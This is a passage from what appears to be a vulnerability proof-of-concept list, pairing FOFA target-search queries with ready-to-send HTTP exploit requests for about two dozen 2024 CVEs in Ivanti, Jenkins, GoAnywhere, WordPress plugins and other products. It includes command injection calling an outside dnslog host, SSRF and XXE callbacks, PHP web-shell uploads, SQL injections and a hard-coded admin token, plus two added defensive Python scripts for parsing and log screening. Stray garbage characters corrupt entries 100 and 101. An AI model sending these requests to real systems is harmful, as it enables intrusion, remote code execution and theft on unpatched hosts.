Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

URL-decoded, the script is }Java.type('java.lang.Runtime').getRuntime().exec('ping a4xs0nop.dnslog.pw');{ : the leading } closes the JavaScript function body the endpoint wraps the script in, and the trailing { keeps the wrapper syntactically valid, so the Runtime call runs at top level.

99. Ncast (Yingkeshi) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

URL-decoded body: {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | echo hello"]}. The param value is passed to the system ping unescaped, so the text after | is executed; "hello" in the response confirms it.

. \' B7 ]) ^# K% ]9 j! O- V100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传 r/ v2 u @8 `, x, \) L
CVE-2024-0352" t4 J; M$ l- ^' ~! |& M9 l
FOFA:icon_hash="874152924": b2 D4 _; M: m5 n$ u! O
POST /api/file/formimage HTTP/1.1$ C, U5 I' ~ D r, H
Host: 192.168.40.1303 Z" T% R. p6 O1 r5 a R+ B
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36& {8 I0 F* G# z- C) U! b
Connection: close' W/ P2 ^# t" g3 k
Content-Length: 201
, _4 z* k! @, t( J/ G: b3 `, Y KContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei4 C2 r/ N V; T8 `/ f; c3 B
Accept-Encoding: gzip
2 o1 T2 ? A- Z" \" h, h2 G
8 R5 i. `2 W6 l- {: G9 f------WebKitFormBoundarygcflwtei* a, j5 L' M, T; ~0 Y1 X
Content-Disposition: form-data; name="file";filename="IE4MGP.php"$ D5 I( {: F- {5 j$ b3 q: D" g* Q( u
Content-Type: application/x-php
- t# ~1 |9 N' e9 L
1 r% C/ f. |" y' k6 |/ M$ V/ o2ayyhRXiAsKXL8olvF5s4qqyI2O
+ ~6 F. X' ~5 ]! m# w------WebKitFormBoundarygcflwtei--8 [. _6 \2 G3 J e) O! n2 ]
/ k$ B1 ]% E( H0 n# `; O! |; L" o
. q M# Z! k- x8 r101. ivanti policy secure-22.6命令注入
, j3 y4 O% K; T5 g, r7 E; K7 ACVE-2024-21887: i' ]4 u* E0 q% D0 C
FOFA:body="welcome.cgi?p=logo"
7 H3 Z* ?. _& D* HGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1' f; O+ V) I' @9 i8 ^: u8 j
Host: x.x.x.xx.x.x.x4 o7 O1 n0 \" t b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; W _6 y" K$ A9 T4 c3 ~) LConnection: close
. o- t5 A1 H. |! q5 bAccept-Encoding: gzip
. m/ `( b. O$ \" n4 m( |5 x+ {6 t% m9 c5 V1 X
102. Ivanti Connect Secure (Pulse Connect Secure) VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

The signature does not need to be valid: the XML-DSig library fetches the RetrievalMethod URI before verification, so a DNS lookup for the dnslog host confirms the SSRF.

103. Ivanti Connect Secure (Pulse Connect Secure) VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAg
ICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML; the parameter entity is resolved when the SAML request is parsed, which produces the out-of-band DNS request:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

A response containing the system status configuration confirms the issue; note that no session token is supplied.

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The Blade-Auth value is an HS512 JWT for the built-in admin account (account "admin", role "administrator"); if the instance still accepts it, the endpoint is reachable without knowing any credentials. An XPATH syntax error carrying the MySQL version string confirms the injection.


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close



108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

The server fetches the url parameter itself; a DNS hit on the dnslog domain confirms the SSRF.


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
The plain CLI over HTTP uses two POSTs that share one Session id and must be in flight together (open the download side first, then send the upload side). The upload body is binary; it is shown here as a Python bytes literal.
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


The download side returns the CLI output. The @/etc/passwd argument is expanded by the args4j parser into one argument per file line, so the first line of the file shows up as the COMMAND default and the second as the surplus argument:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


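The framing in the upload body above is easier to reason about when it is built and parsed programmatically. The following Python is an added example written for this edit, not code from the article or from the Jenkins project: it reproduces the upload body byte for byte from a list of CLI arguments, parses such a body back into frames, flags any @file argument (the args4j expansion that CVE-2024-23897 abuses, useful when triaging a captured request), and extracts from the download-side response the two lines of the target file that help @/etc/passwd echoes back. The opcode numbers are read off the bytes on this page, and the sample response is the one printed above.

```python
# Added example for entry 109 (not from the article or the Jenkins project).
# Builds and parses the plain-CLI framing shown in the request body above.
import re
import struct

# Opcodes as they appear in the upload body above: 0 = argument, 1 = locale,
# 2 = encoding, 3 = start. (Assumption: numbering read off the bytes on this page.)
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3


def _utf(text):
    """Java DataOutput.writeUTF layout: 2-byte big-endian length, then the bytes."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op, payload=b""):
    """One frame: 4-byte big-endian payload length, 1-byte opcode, payload.
    The length does not include the opcode byte, so START is 00 00 00 00 03."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_upload(args, encoding="GBK", locale="en_US"):
    """Body of the 'Side: upload' POST: one ARG frame per CLI argument, then
    ENCODING, LOCALE and START, in the order used by the request above."""
    body = b"".join(frame(OP_ARG, _utf(a)) for a in args)
    body += frame(OP_ENCODING, _utf(encoding))
    body += frame(OP_LOCALE, _utf(locale))
    body += frame(OP_START)
    return body


def parse_frames(body):
    """Inverse of build_upload: returns a list of (opcode, payload) tuples."""
    frames, i = [], 0
    while i < len(body):
        (length,) = struct.unpack(">I", body[i:i + 4])
        op = body[i + 4]
        payload = body[i + 5:i + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated frame at offset %d" % i)
        frames.append((op, payload))
        i += 5 + length
    return frames


def file_expansion_args(body):
    """Paths that args4j would read and splice into the argument list: every ARG
    whose text starts with '@'. Useful when triaging a captured upload body."""
    found = []
    for op, payload in parse_frames(body):
        if op != OP_ARG:
            continue
        (n,) = struct.unpack(">H", payload[:2])
        text = payload[2:2 + n].decode("utf-8")
        if text.startswith("@"):
            found.append(text[1:])
    return found


def leaked_lines(download_response):
    """Lines of the target file that 'help @/etc/passwd' echoes back: the first
    file line becomes the COMMAND default in the usage text, the second is
    rejected as a surplus argument. Returned in file order."""
    first = re.search(r"\(default: (.+?)\)", download_response)
    second = re.search(r"Too many arguments: (.+)", download_response)
    return [m.group(1) for m in (first, second) if m]


# The download-side response printed above, used here as sample input.
SAMPLE_DOWNLOAD = (
    "ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "java -jar jenkins-cli.jar help [COMMAND]\n"
    "Lists all the available commands or a detailed description of single command.\n"
    " COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)\n"
)

if __name__ == "__main__":
    body = build_upload(["help", "@/etc/passwd"])
    print(body.hex())
    print(file_expansion_args(body))
    print(leaked_lines(SAMPLE_DOWNLOAD))
```

Only two lines leak per request with help because it accepts a single argument; that is why the POC targets small, high-value files. For screening, parse_frames and file_expansion_args can be run over request bodies captured at a reverse proxy in front of Jenkins: any ARG beginning with @ from an unauthenticated client is a probe for this issue.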
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The ..;/ segment gets past the filter that blocks the initial-setup wizard after installation. A 200 that renders the account-setup form means a new administrator can be created through it.


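Several entries in this list (95 and 96 OFBiz, 101 Ivanti, 109 Jenkins, 110 GoAnywhere, 115 Bricks) can be screened for in web access logs, but only after the request path is canonicalised: %3b and double percent-encoding, Tomcat-style ..;/ and xmlrpc;/ path parameters, and ../ traversal all defeat plain substring matching. The following Python is an added example for defenders, not code from the article: it canonicalises each request target, matches it against a small indicator table built from the paths printed in those entries, and runs over a few constructed log lines. The indicator table, the sample log lines and the benign /api/v1/license/keys-status control line are assumptions constructed for illustration; a real deployment would extend the table and tune the Ivanti rule to its own API traffic.

```python
# Added example for screening access logs against entries 95/96, 101, 109, 110
# and 115 of this list (not from the article). Indicator table and sample log
# lines are constructed for illustration.
import posixpath
import re
from urllib.parse import unquote, urlsplit

# (label, regex on canonical path, regex on decoded path or None, regex on query or None)
INDICATORS = [
    ("OFBiz xmlrpc, entry 95 (CVE-2023-49070)",
     r"^/webtools/control/xmlrpc$", None, None),
    ("OFBiz ProgramExport, entry 96",
     r"^/webtools/control/ProgramExport$", None, None),
    ("Ivanti keys-status traversal + command injection, entry 101 (CVE-2024-21887)",
     r"^/api/v1/license/keys-status", r"/\.\./.*;", None),
    ("Jenkins plain CLI, entry 109 (CVE-2024-23897)",
     r"^/cli$", None, r"(^|&)remoting=false(&|$)"),
    ("GoAnywhere setup wizard via '..;/', entry 110 (CVE-2024-0204)",
     r"/wizard/InitialAccountSetup\.xhtml$", r"\.\.;/", None),
    ("Bricks render_element, entry 115 (CVE-2024-25600)",
     r"^/wp-json/bricks/v1/render_element$", None, None),
]

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def canonicalize(target, enabled=True):
    """Return (decoded_path, canonical_path, query) for one request target.

    decoded_path  : percent-decoded twice (catches %252e double encoding), otherwise raw
    canonical_path: additionally drops ';param' from every segment, so '..;/' and
                    'xmlrpc;/' fold back to '../' and 'xmlrpc/', then collapses dot
                    segments. With enabled=False both views are the raw path, which
                    is what a naive substring matcher sees.
    """
    parts = urlsplit(target)
    path, query = parts.path, parts.query
    if not enabled:
        return path, path, query
    for _ in range(2):
        path = unquote(path)
    decoded = path
    stripped = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return decoded, posixpath.normpath(stripped), query


def match_indicators(target, enabled=True):
    """Labels of every indicator the target satisfies."""
    decoded, canonical, query = canonicalize(target, enabled)
    hits = []
    for label, canon_re, decoded_re, query_re in INDICATORS:
        if not re.search(canon_re, canonical):
            continue
        if decoded_re and not re.search(decoded_re, decoded):
            continue
        if query_re and not re.search(query_re, query):
            continue
        hits.append(label)
    return hits


def scan_access_log(lines, enabled=True):
    """(line_number, label) for each combined-format log line that matches."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        for label in match_indicators(m.group("target"), enabled):
            findings.append((n, label))
    return findings


# Constructed sample lines (not real traffic). Line 7 is a control: the same
# endpoint as entry 101 without the traversal, which must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Feb/2024:10:00:01 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [01/Feb/2024:10:00:02 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 200 0 "-" "curl/8.0"',
    '10.0.0.7 - - [01/Feb/2024:10:00:03 +0000] "GET /api/v1/totp/user-backup-code/%252e%252e/%252e%252e/license/keys-status/%253bid HTTP/1.1" 200 0 "-" "curl/8.0"',
    '10.0.0.8 - - [01/Feb/2024:10:00:04 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Feb/2024:10:00:05 +0000] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.10 - - [01/Feb/2024:10:00:06 +0000] "POST /cli?remoting=false HTTP/1.1" 200 163 "-" "python-requests/2.31"',
    '10.0.0.11 - - [01/Feb/2024:10:00:07 +0000] "GET /api/v1/license/keys-status HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, label in scan_access_log(SAMPLE_LOG):
        print(n, label)
    print("naive:", [n for n, _ in scan_access_log(SAMPLE_LOG, enabled=False)])
```

Run with canonicalisation the scan flags lines 2 to 6; with enabled=False (raw path matching) it only flags lines 4 and 6, missing the percent-encoded Ivanti requests and the xmlrpc;/ variant. The decoded-path regex is what keeps the control line 7 quiet: the keys-status endpoint alone is legitimate traffic, the traversal into it is not.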
111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Time-based: a response delayed by about six seconds confirms the injection in the id parameter.


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

The type value is spliced into a column name; the backtick closes it, and a five-second delay confirms the injection.

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The link parameter is fetched unfiltered: a file:// URL reads local files, an http:// URL turns the same request into an SSRF.

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Time-based on the user parameter: a five-second delay confirms it.

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce. It is issued to unauthenticated visitors and appears in the inline script data of any front-end page.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce and execute the command. The queryEditor string is evaluated as PHP by the render_element endpoint; the command output is returned inside the exception message.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<nonce from step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
The handler is under /wp-admin/, so a logged-in WordPress session is required. The support_custom_img field accepts a .php filename; {{rand8}} is a placeholder for a random eight-character name.
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

The id[where] array key is concatenated into the WHERE clause; a five-second delay confirms it. admin-ajax.php actions can be reached without authentication, so no session is needed.

118. Byzoro (Beijing Baichuo) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


The txt_path field controls where the file is written. Then access /home/src.php and pass the command in the passwd POST parameter.

119. Byzoro (Beijing Baichuo) Smart S20 sysmanageajax.php SQL injection (authenticated)
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

Time-based blind injection in the id field: the response is delayed by about five seconds only when the condition (here, a three-character database name) is true.

120. Byzoro (Beijing Baichuo) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


Uploaded file path: /upload/2.php

121. Byzoro (Beijing Baichuo) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
